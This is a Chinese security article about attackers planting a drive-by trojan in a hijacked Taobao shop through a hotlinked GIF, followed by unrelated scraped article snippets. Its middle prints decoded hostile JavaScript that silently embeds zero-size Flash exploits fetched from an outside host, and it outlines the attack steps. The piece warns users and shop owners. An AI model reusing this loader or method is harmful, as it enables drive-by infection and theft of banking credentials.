警钟:黑客在淘宝中挂马

  淘宝网——中国最大的购物网站,根据Alexa统计该居于全世界网站访问量排名的第22位,每天有无数人访问该网站。围绕在这个不打烊的购物网站周围的全是那些使用网银的用户,在黑客眼中他们就是猎物。

  最近就有黑客发现了淘宝网的挂马漏洞——淘宝网允许用户将第三方网站的图片在淘宝店铺中显示。这个漏洞存在了很多年了,为什么现在才被黑客利用呢?在2007年之前,还没有图片挂马这种方式,该漏洞就等于不是漏洞。

  自从图片挂马在2008年盛行后,就有黑客研究了这个存在多年的漏洞,但还是没有造成大的影响,为什么呢?是要利用该漏洞必须要取得网店的控制权吗?这不是关键原因!要对图片进行加密处理,成功通过淘宝的过滤,这才是关键的,而且这种方法已经被黑客成功掌握了。

  目前,淘宝网已经有店铺被挂马了(在截稿之前,我们已经通知了淘宝网,得到了及时的处理)。这意味着什么?如果挂马漏洞被广泛利用,所有访问淘宝的用户都可能中毒,一旦病毒进入电脑成功运行,就可能会盗走网银中的“真金白银”。

  淘宝店铺被挂马

  3月19日,我想帮女朋友在淘宝网上挑选一款手机,然而正在浏览店铺时,电脑中的防挂马软件突然连续报警,提示一个网址名为http://shop3387***.taobao.com的淘宝店铺中含有恶意网站(图1)。

  这个警报让我大吃一惊,因为根据我的经验,淘宝这样知名的电子商务网站安全防范措施一般比较多,遭到木马攻击的可能性相对小网站而言小得多。我发现该网站是一个“皇冠”级别的店铺,更加大了我追查挂马来源的兴趣。

  于是赶紧在浏览器中点击右键选择“查看源文件”,查看该店铺页面的源代码(图2)。根据经验,我发现该店铺使用了一个GIF图片作为自己的店面图片,正是这个图片调用的木马导致了防挂马软件连续报警。

  而根据这家店铺的统计数字显示(图3),这家店铺从开张到现在的流量几乎接近200万,平均每天访问人数高达1万人,而一个个穿行在这间危险店铺期间的顾客或许并不知道,此时木马病毒或许已经悄悄的进入了他们不设防的电脑之中,开始窃取他们的数据、隐私、银行账号……

  问题出在哪?

  近年来淘宝在网络安全方面投入颇多,特别是支付系统的安全性提升较高。在淘宝店铺方面,淘宝也不允许店主轻易将站内连接地址跳转到第三方网站,在防欺诈方面起到了安全防护作用。可采取了如此多的措施,为什么浏览淘宝店铺还可能被挂马呢?黑客又是通过什么样的手段将图片木马挂到淘宝上的?

  从淘宝建立之初,大概是出于节约服务器资源的考虑,淘宝一直没有为店铺提供可供上传展示商品图片的选项,用户能够上传的只有略缩图图片。因此淘宝网允许用户将第三方网站的图片在淘宝店铺中显示。

  允许用户用于商品展示和部分店铺装饰的图片来自第三方网站,就给黑客留下了无限发挥的潜力。特别是2008年,图片挂马已经成为一种主流挂马方式,在互联网中也可以找到众多的图片木马制作工具,而且操作过程简单,隐蔽性极高,也容易被用户忽视,此时如果用户的电脑没有及时打补丁和安装放病毒软件,则会在不知不觉中被木马入侵。

  黑客是这样做到的

  经过我分析,发现黑客在淘宝中使用的图片挂马方式,与《电脑报》介绍的“反击网页木马”系列中介绍的挂马手段有很多技术相似点,只不过进行了组合使用,这才绕过了淘宝的防护措施。

  第一步:这名黑客将免杀处理的“木马下载器”上传到自己的网站,然后利用Adobe Flash Player SWF文件漏洞制作了一个溢出下载运行“木马下载器”的脚本网页木马,并通过Encode进行了网页代码加密(代码解密后如图4所示),并上传到自己指定的网站中。

  代码解密后如下:

 window.onerror=function(){return true;}

  function init(){window.status="";}window.onload = init;

  if(document.cookie.indexOf("play=")==-1){

  var expires=new Date();

  expires.setTime(expires.getTime()+24*60*60*1000);

  document.cookie="play=Yes;path=/;expires="+expires.toGMTString();

  if(navigator.userAgent.toLowerCase().indexOf("msie")>0)

  {document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-

  444553540000"codebase="http://download.macromedia.com/pub/

  shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0"

  height="0" align="middle">');

  document.write('<param name="allowScriptAccess" value="always"/>');

  document.write('<param name="movie" value="http://www.psp 1111 .cn

  /flash/versionie.swf"/>');

  document.write('<param name="quality" value="high"/>');

  document.write('<param name="bgcolor" value="#ffffff"/>');

  document.write('<embed src="http://www.psp****.cn/

  flash/versionie.swf"/>');

  document.write('</object>');

  }else

  {document.write("<EMBED src=http://www.psp 1111 .cn/

  flash/versionff.swf width=0 height=0>");}}

  第二步:黑客使用了一种GIF图片挂马木马生成器,该生成器提供两种挂马方式,一种是直接允许输出的图片能运行黑客指定的EXE木马,另外一种则是利用跳转功能将网页跳转到黑客指定的挂马网页。

  黑客选择了查杀困难更大的网页跳转式挂马,他首先运行GIF图片挂马生成器,在“网页跳转式图片木马”一项下方输入自己上传的溢出网页木马页面网络地址,然后点击地址下方的“生成”按钮(图5),快速的将GIF图片木马生成好。当这张图片上传到网上被用户浏览后,用户的浏览器会自动跳转到恶意挂马页面,运行挂马页面的病毒程序。

  第三步:黑客通过技术手段窃取了淘宝某店铺的账号(由于我们看到是一个皇冠信誉级别的淘宝商铺,因此怀疑这名店铺的店主可能也是受害者),在窃取到店铺账号和密码后,黑客进入到淘宝店主的后台,通过淘宝的店铺设置功能,在该店铺中插入了自己指定的GIF网页木马地址,然后悄悄退出网店,就完成了全部的挂马操作。

  此时任何浏览该页面的用户都会进入一个连环陷阱,先执行网页木马,随后运行木马下载器,下载更多的木马到自己电脑中执行,形成一个恶性的死循环,最终导致自己的网银账号等信息被盗取。

  防范方案

  面对未知的挂马漏洞,普通用户只要做好自己的安全防范,就可以以不变应万变(具体方法参见上期F7《“鸡尾酒”法预防盗号》一文)。病毒进不了电脑,或者进入电脑又存活不了,我们就达到了目的,根本不需要知道病毒利用的是什么漏洞。

  对淘宝店主而言,可以选择一些Web反挂马程序例如锐甲,来监视自己的店铺,此外也需要经常查杀病毒。当然,淘宝也需要重新考了图片引用的问题,建立自己的图片服务器或者与第三方签订图片保存协议,确保引用图片的安全性。

时间: 2024-11-08 19:54:56

警钟:黑客在淘宝中挂马的相关文章

淘宝支付 优惠券实习-怎么实现像淘宝一样的网银支付功能,并且实现淘宝中的优惠劵使用?

问题描述 怎么实现像淘宝一样的网银支付功能,并且实现淘宝中的优惠劵使用? 最近一直在想这个问题,没思路,望各位给个思虑.....分数比较低哦,我没多少分了,谅解下哦! 解决方案 网银貌似需要向银行申请接口. 解决方案二: 支付功能的话 要去谈接口 优惠券的使用要自己去设计程序哦 解决方案三: 这些东西 都是要公司洽谈好之后 ,服务器接入这些服务.然后开启相应的接口.客户端展现的功能而已.客户端不用太多纠结如何实现这些. 客户端最多就是拿到相应的接口 解析 展示 提交数据.

90后大学生在淘宝中的摸爬滚打

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 作为一名标准90后的大学生,总感觉要做点什么,但无从下手. 听一个学长说了自己开淘宝店赚钱的故事后,就感觉热血沸腾,似乎是年轻人的冲劲吧,把攒了好久的钱都拿出来开了家网店.看网上很多人都说新手开充值店比较容易上手,就找了个代理,弄好模板,便开始了我的淘宝生涯. 新店开张不宣传肯定是没生意的,这个道理我还是懂的,于是利用周边资源,在学校的BBS

android 购物-类似于手机淘宝中的功能

问题描述 类似于手机淘宝中的功能 我想实现一个类似于淘宝中那种看到商品后一点开就可以看到商品详情的功能.android版的.大概的实现思路是什么.求大神指教 解决方案 直接用按钮或者textview跳转到另一个fragment或者activity,并且传商品的id 参考:http://www.cnblogs.com/allenzheng/archive/2013/05/02/3054484.html 解决方案二: 点击按钮跳转页面 做好viewpage就可以了

黑客借“甲型流感”传毒 挂马疾病预防控制中心网站

4月开始的一场全球性的甲型流感,使得疫情防控成为公众关注的焦点.然而,金山毒霸云安全中心却监测到网络上已有黑客针对该事件发起了恶意攻击. 据金山互联网安全公司发布的<2009年4月份中国电脑病毒疫情及互联网安全报告>,海南省疾病预防控制中心网站多次被黑客挂马.金山毒霸反病毒专家李铁军表示,这是黑客利用热点事件发起攻击的一个典型案例,当大家探讨该如何有效控制及预防甲型H1NI流感在全球进一步蔓延之时,攻击病预防控制中心网站,实属丧心病狂. <2009 年4月中国互联网安全报告>还显示

黑客最后疯狂 “章鱼保罗”挂马网页一夜增上万

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 新华社北京7月12日体育专电(记者张舵)12日凌晨,伴随着荷兰与西班牙精彩对决的结束,南非世界杯落下帷幕.与此同时,网络黑客也上演了最后的疯狂. 据相关监测中心统计,截止到7月12日清晨8点,在之前的12个小时内,互联网上以世界杯决赛结果预测."章鱼保罗"等为关键字的挂马网页数量大幅度增加,已经多达上万个. 金山安全公司反

怎么查看淘宝中的购买记录

1.在浏览器打开我们进入到淘宝网,然后登录淘宝网站,然后在顶部点击"我的淘宝"-"已买到的宝贝"---点击它进入. 2.在进入到我们打开的新页面中你会看到有 "订单回收站"选项,我们找到点击订单回收站进入: 3.在页面右侧有"还原订单"几个字,点击就可以看到以前的订单了. 好了这样我们的购买记录就恢复了,如果在这里面也没有找到有一种可能就是时间长了系统自动清除或你以前在回收站长有清除过了,这样的话是无法恢复了哦.

海边孩子在淘宝中的酸甜苦辣

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 潮起潮落,如同人生,不会一帆风顺,也不会以永远倒霉.空闲的时候,我经常去银滩那的海边坐着,看着潮起潮落,静静的思考些问题. 海水是咸的,不是所有人都能喝的,只有有智慧的人用他的智慧才能喝海水.这是我开淘宝网店的第三个年头了,要是说真正开淘宝店的时间,其实是两年.三年中空闲出了一年.有人要问你那一年干嘛了,我用这一年学了不少智慧和本领,能让自己

未找到工作先遇黑客 八大人事局网站被挂马

本想去当地的人事局网站看看就业信息,没想到一打开竟然全是淫秽网站.家住开封的大四学生小李近日遇上了不堪的事.原来黑客打起了就业人群的主意,斗胆在开封人事局网站(http://www.kfrs.gov.cn/inc/)上做起"有色"买卖.  金山互联网安全公司发布的<2009 年3月中国互联网安全报告>显示,3月份金山毒霸云安全中心共截获有效挂马网址272,221个,与2月份相比,增加了近3倍.其中,政府.学校网站仍然是被挂马的重灾区. 八大人事局网站被挂马 开封人事网htt

黑客盗窃淘宝的网店主资金获刑

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断淘宝客 站长团购 云主机 技术大厅 20岁的黑龙江无业人员段宗屹,通过发送 "灰鸽子"木马病毒,获取淘宝网店铺店主的银行信息,先后3次盗取店主账户内两万余元资金.近日,宣武法院以盗窃罪判处段宗屹有期徒刑3年零6个月,并处罚金4000元. 去年3月30日至6月30日间,段宗屹在黑龙江省牡丹江市操控电脑,登录淘宝网站,分别进入3名被害人在网上经营的服装店